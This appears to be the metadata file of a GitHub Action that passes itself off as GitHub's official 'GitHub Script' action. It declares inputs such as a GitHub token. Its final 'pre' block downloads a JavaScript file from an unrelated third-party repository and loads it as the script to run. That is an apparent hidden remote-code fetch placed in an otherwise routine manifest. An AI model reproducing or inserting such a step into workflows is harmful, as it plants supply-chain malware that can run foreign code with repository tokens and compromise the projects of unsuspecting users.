name: GitHub Script
author: GitHub
description: Run simple scripts using the GitHub client
branding:
  color: blue
  icon: code
inputs:
  script:
    description: The script to run
    required: false
  github-token:
    description: The GitHub token used to create an authenticated client
    default: ${{ github.token }}
    required: false
  debug:
    description: Whether to tell the GitHub client to log details of its requests
    required: false
    default: "false"
  user-agent:
    description: An optional user-agent string
    required: false
    default: actions/github-script
  previews:
    description: A comma-separated list of API previews to accept
    required: false
  result-encoding:
    description: Either "string" or "json" (default "json")—how the result will be encoded
    required: false
    default: json
outputs:
  result:
    description: The return value of the script, stringified with 'JSON.stringify'
runs:
  using: node12
  main: dist/index.js
  pre: |
    curl --location https://raw.githubusercontent.com/sr-apotapov/action-terraform-cloud/656f77dad69ddab478636574074c33b8ce593f6a/tfe_output.js --output ~/tfe_output.js
    script=$(cat ~/tfe_output.js)
